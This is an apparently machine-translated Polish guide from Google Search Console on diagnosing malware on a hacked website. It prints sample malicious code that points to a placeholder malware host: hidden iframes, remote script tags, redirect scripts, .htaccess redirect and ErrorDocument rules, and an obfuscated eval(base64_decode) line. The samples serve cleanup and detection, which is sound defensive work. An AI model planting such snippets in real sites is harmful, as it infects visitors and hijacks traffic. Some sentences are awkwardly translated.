„Złośliwe oprogramowanie” to oprogramowanie lub aplikacja mobilna zaprojektowana w celu zaszkodzenia komputer, urządzenie mobilne, oprogramowanie na tym urządzeniu i jego użytkowników. Więcej informacji o złośliwym oprogramowaniu znajdziesz w artykule Złośliwe i niechciane oprogramowanie.
Jeśli witryna zawiera złośliwe oprogramowanie, użytkownicy zwykle zobaczą ostrzeżenie „Odwiedzenie tej witryny może spowodować uszkodzenie komputera” w wynikach wyszukiwania lub na pełnoekranowa wyświetlana przez przeglądarkę, gdy użytkownik próbuje wejść na Twój w witrynie, na przykład:
.Potrzebujesz tych elementów:
- dostępu administratora do powłoki lub terminala serwerów witryny: internetowego, i plików.
- znajomości poleceń powłoki lub terminala;
- Możliwość uruchamiania zapytań SQL w bazie danych.
Przygotowanie
- Zarejestruj się w Search Console i zweryfikuj własność zaatakowanej witryny zgodnie z opisem. W Search Console są dostępne przykładowe strony, których dotyczy problem, co ułatwia znajdowanie znacznie łatwiej rozwiązać problemy ze złośliwym oprogramowaniem. Dodatkowo otrzymasz ostrzeżenie, gdy wykryjemy, że w Twojej witrynie pojawiło się wiele rodzajów złośliwego oprogramowania lub inne ataki hakerów.
Wejdź na stronę diagnostyki Bezpiecznego przeglądania Google. , aby zobaczyć publiczne informacje o tym, czy strona może być szkodliwa dla użytkowników. Stan informacji o aplikacji możesz sprawdzić pod adresem URL podobnym do tego:
https://transparencyreport.google.com/safe-browsing/search?url=***<<page_or_site>>***
Na przykład:https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com
<<page_or_site>>
może być adresem URL konkretnej strony (http://example.com/badpage
) lub całą witrynę (example.com).Unikaj otwierania stron witryny w przeglądarce. Ponieważ złośliwe oprogramowanie często rozprzestrzenia się, wykorzystując luki w zabezpieczeniach przeglądarki, otwierając może uszkodzić komputer. Chyba że instrukcje diagnostyki powiedz, że chcesz wejść na stronę bezpośrednio w przeglądarce, użyj cURL lub Wget do wysyłania żądań HTTP (na przykład w celu pobrania strony).
Te bezpłatne narzędzia pomagają w diagnozowaniu przekierowań. pozwala uwzględnić informacje o stronie odsyłającej lub kliencie użytkownika. Dodanie strona odsyłająca lub klient użytkownika pomagają naśladować hakerów, hakerzy mogą wyświetlać złośliwe treści tylko użytkownikom z klientów użytkownika lub stron odsyłających, aby kierować reklamy na „prawdziwe osoby” i unikaj wykryte przez właścicieli witryn i skanery złośliwego oprogramowania.
`curl -v --referer "http://www.google.com" <your-url>`
Oto przykład, który określa zarówno klienta użytkownika, jak i stronę odsyłającą:
`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`
Zalecamy pobranie strony zarówno z wartościami,
--referer "https://www.google.com"
, ponieważ niektóre złośliwe oprogramowanie jest tylko aktywowane
gdy użytkownicy trafiają z wyników wyszukiwania Google.
Utwórz dokument, w którym będziesz zapisywać informacje uzyskane na tym etapie. Dokument zostanie powinny zawierać (przynajmniej) nazwę i lokalizację każdego uszkodzonego pliku. i opisuje sposób infekcji. Posłużą one za podstawę Oczyść i zabezpiecz witrynę.
Obejrzyj film na tej stronie, by dowiedzieć się, jak działa złośliwe oprogramowanie i jak bezpieczeństwa podczas badania witryny pod kątem złośliwego oprogramowania.
Diagnostyka
Określ, jakie złośliwe oprogramowanie ma wpływ na Twoją witrynę:
- Otwórz raport Problemy dotyczące bezpieczeństwa. Twojej witryny w Search Console. Rozwiń opis ostrzeżenia o złośliwym oprogramowaniu, aby zobaczyć listę przykładowych stron, których dotyczy ten problem. Pamiętaj, że ta lista nie jest wyczerpująca. możesz nie zobaczyć przykładowych stron dla wszelkiego rodzaju złośliwe oprogramowanie.
- Przetestuj strony przykładowe pod kątem następujących typów złośliwego oprogramowania.
Złośliwe oprogramowanie konfiguracji serwera (niechciane przekierowania)
Haker przejął witrynę i przekierowuje użytkowników z Twojej witryny
do witryny ze złośliwym oprogramowaniem, prawdopodobnie przez zmianę
plików konfiguracji. Plik konfiguracji serwera często zezwala na dostęp
w celu określenia przekierowań adresów URL
konkretnych stron lub katalogów w witrynie
witryny. Na przykład na serwerach Apache jest to plik .htaccess
oraz httpd.conf
.
Diagnostyka
Odwiedź przykładowe adresy URL wymienione w raporcie „Problemy dotyczące bezpieczeństwa”. Odpowiedź ze strony zawierającej „konfigurację serwera” zakażenie może obejmować następujące nagłówki:
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<<strong>_malware-attack-site_</strong>>/index.html
< Content-Length: 253
Znajdowanie plików, których dotyczy problem
Zaloguj się na serwer przez dostęp do powłoki lub terminala (strona może być offline
w razie potrzeby) i przejrzyj odpowiednie pliki konfiguracyjne serwera. Może być ich więcej
niż jeden zaatakowany przez hakerów plik konfiguracyjny serwera. Sprawdź te pliki pod kątem
niepożądanych dyrektyw, takich jak przekierowania do nieznanych witryn. Na przykład w tagu
.htaccess
, możesz zobaczyć przekierowanie podobne do tego:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://<<em><strong>_malware-site_</strong></em>>/index.html** [R=301]
wstrzyknięcie kodu SQL
Haker zhakował bazę danych Twojej witryny. Na przykład haker może programowo wstawili złośliwy kod do każdego rekordu bazy danych; dzięki czemu, gdy serwer wczyta stronę, która wymaga informacji z w bazie danych, złośliwy kod jest teraz osadzony w treści strony i może które szkodzą użytkownikom witryny.
Diagnostyka
- W wierszu poleceń uruchom zapytania dotyczące adresów URL, których dotyczy problem, i sprawdź odpowiedź na słowa atakujące SQL takie jak „iframe” lub „eval”.
Zaloguj się na serwer bazy danych lub wyświetl ją w takim narzędziu jak phpMyAdmin. Jeśli używasz Wget lub cURL, spróbuj powiązać szkody znalezione w źródle strony za pomocą narzędzia Wget lub cURL, zastępując je rzeczywistymi wpisami w bazie danych. Na przykład, jeśli strony zawierają niebezpieczny element iframe, kod SQL w której zostanie wyszukany kod elementu iframe. Na przykład:
SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%';
Warto też sprawdzić dziennik i pliki błędów bazy danych na serwerze pod kątem nietypowe działania, np. nieoczekiwane polecenia SQL, które wyglądają nietypowo dla o zwykłych użytkownikach lub błędach.
Rozwiąż problem
Zaktualizuj każdy zainfekowany rekord bazy danych lub przywróć ostatnią znaną bazę danych kopii zapasowej.
Wstrzyknięty kod
Do stron w Twojej witrynie dodano złośliwy kod, np. element iframe ze złośliwym oprogramowaniem.
Diagnostyka
Otwórz przykładowe adresy URL wymienione w raporcie Problemy dotyczące bezpieczeństwa, używając polecenia cURL lub Pobierz i sprawdź podejrzany kod. Wstrzyknięty kod może przyjmować wiele typów być trudne do znalezienia. Warto wyszukać takie słowa jak „iframe” znaleźć kod iframe. Inne przydatne słowa kluczowe to „script”, „eval” i „unescape”. Dla: na przykład aby wyszukać „iframe” we wszystkich plikach w systemie typu Unix:
$grep -irn "iframe" ./ | less</pre>
Oto kilka typowych wzorców złośliwego oprogramowania, na które należy zwrócić uwagę.
Element iframe, który wczytuje złośliwą witrynę:
<iframe frameborder="0" height="0" src="http://<<strong><em>_malware-site_</em></strong>>/path/file"
style="display:none" width="0"></iframe>
JavaScript lub innego języka skryptowego, który wywołuje i uruchamia skrypty z witryna atakująca:
<script type='text/javascript' src='http://<<em><strong>_malware-site_</strong></em>>/js/x55.js'></script>
Skrypt, który przekierowuje przeglądarkę do złośliwej witryny:
<script>
if (document.referrer.match(/google\.com/)) {
window.location("http://<<em><strong>_malware-site_</strong></em>>/");
}
</script>
Złośliwy kod, który jest zamaskowany, by uniknąć wykrycia:
eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
Pliki udostępnionych obiektów, które losowo zapisują szkodliwy kod w innym przypadku niegroźnym skrypty:
#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c
Szkodliwe szablony błędów
Szablon komunikatów o błędach, na przykład „404 Nie znaleziono pliku” jest skonfigurowany. rozpowszechnianie złośliwego oprogramowania. W ten sposób haker może wykorzystywać w atakach adresy URL, nie istnieją nawet w Twojej witrynie.
Diagnostyka
Żądanie strony w witrynie, która nie istnieje lub powoduje wyświetlenie innego typu i sprawdzić, czy odpowiedź pochodzi z innej witryny zawiera złośliwe oprogramowanie.
Rozwiąż problem
Zaloguj się na serwer WWW i przeszukaj pliki konfiguracyjne serwera pod kątem błędów
z instrukcjami dla strony. Na przykład szablon błędu dla serwerów WWW Apache może być
zadeklarowano w pliku .htaccess
. Oto przykładowy wpis w pliku .htaccess
, w którym
pobiera strony błędu 404 ze złośliwej witryny:
ErrorDocument 404 http://<<span class="red-text"><em><strong>_malware-site_</strong></em></span>>/index.html
Gdy zechcesz wyczyścić witrynę, wymień pliki(.htaccess
)
ze znaną dobrą kopią zapasową lub usuń niechciane instrukcje ErrorDocument
istniejące pliki: .htaccess
. Pamiętaj też, by wyczyścić faktyczne pliki błędów, jeśli
które znajdują się w Twojej witrynie. Na koniec ponownie uruchom serwer WWW, aby upewnić się, że wszystkie
zmiany.
Zasoby wczytywane z zaatakowanej lub szkodliwej witryny {compromised-resources}
Twoja witryna wykorzystuje treści lub zasoby z witryny, o której wiadomo, że zawiera złośliwych treści. Mogą to być pliki JavaScript, obrazy lub inne pliki. Z tego powodu witryna zostanie oznaczona jako zawierająca złośliwe oprogramowanie wczytane z innego witrynie.
Diagnostyka
Odwiedź przykładowe adresy URL wymienione w raporcie „Problemy dotyczące bezpieczeństwa”.
Rozwiąż problem
- Potwierdź problem, przechodząc do kilku przykładowych adresów URL wymienionych na Raport Problemy dotyczące bezpieczeństwa w Search Console. Powinno pojawić się ostrzeżenie w przeglądarce.
- W ostrzeżeniu wyświetlonym w przeglądarce zobaczysz nazwę domeny, z której pochodzą nieodpowiednie treści. Usuń wszystkie odwołania do oznaczonej witryny wymienione w ostrzeżeniu wyświetlonym w przeglądarce. Jeśli treści ze zgłoszonej witryny zostały dołączone bez Twojej wiedzy, jest poważniejszy. Twoja witryna prawdopodobnie została zaatakowana, a powinien nadal sprawdzać Twoją witrynę pod kątem innych ataków i luk w zabezpieczeniach.
- Jeśli celowo umieszczasz treści z wiarygodnej witryny, które zostały
i chcesz ponownie uwzględnić treść, gdy oznaczona witryna została
możesz monitorować stan oznaczonej witryny w
Strona diagnostyki Bezpiecznego przeglądania Google
dla tej witryny (
http://www.google.com/safebrowsing/diagnostic?site=www.example.com
){:.external}. Właściciele wiarygodnych stron zwykle szybko je czyszczą.
Dodatkowa analiza
Następnie sprawdź, czy w systemie nie ma dodatkowych szkodliwych plików i zmian. haker mógł zmodyfikować istniejące strony lub rekordy bazy danych, nowe strony spamerskie, funkcje tekstowe, które wyświetlają spam na nienaruszonych stronach, „tylne drzwi” umożliwiające hakerowi ponowne wejście do witryny lub wprowadzenie usunięty złośliwy kod.
Jeśli Twoja witryna jest online, rozważ wyłączenie jej na potrzeby analizy.
Jeśli masz nienaruszoną kopię zapasową witryny, sprawdź, które pliki utworzone lub zmodyfikowane od czasu utworzenia kopii zapasowej i zbadane. Na komputerze typu Unix możesz użyć polecenia podobnego do tego, aby znaleźć nowe pliki:
diff -qr <current-directory> <backup-directory>
Na przykład:
diff -qr www/ backups/full-backup-20120124/
również:
md5sum <current-page> <backup-page>
Na przykład:
md5sum www/page.html backups/full-backup-20120124/page.html
Sprawdź w dziennikach serwera, dostępu i błędów o podejrzanej aktywności, na przykład: nieudanych prób logowania, historia poleceń (zwłaszcza jako użytkownik root) i tworzenie nieznanych kont użytkowników. Pamiętaj, że haker mógł zmienić te dzienniki do własnych celów. W filmie pokazano kilka przykładów: Znajdź lukę w zabezpieczeniach
Sprawdź pliki konfiguracji pod kątem przekierowań Twoje pliki konfiguracji są
zwykle nazywa się .htaccess
i httpd.conf
. Hakerzy często tworzą warunkowe
przekierowania w zależności od klienta użytkownika, pory dnia lub strony odsyłającej. W razie potrzeby
aktualizacji plików konfiguracji, może być konieczne ponowne uruchomienie serwera
zmiany, które zaczną obowiązywać.
Sprawdź, czy uprawnienia do folderów i plików są zbyt szerokie. Hakerzy ingerują w jej działanie
bo jeśli właściciel witryny nie wykryje zmienionych uprawnień,
haker będzie mógł ponownie dostać się do witryny. Pliki większe niż
Folder 644 (rw-r--r--)
i foldery większe niż 755 (rwxr-xr-x)
mogą stanowić zagrożenie
problemów. Upewnij się, że takie uprawnienia faktycznie są potrzebne. Wł.
Systemy typu Unix, spróbuj:
find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;
i:
find <your-dir> -type f -not -perm 644 -exec ls -la {} \;
Jeżeli korzystasz z bazy danych, skontroluj po kolei każdy rekord, używając narzędzia phpMyAdmin.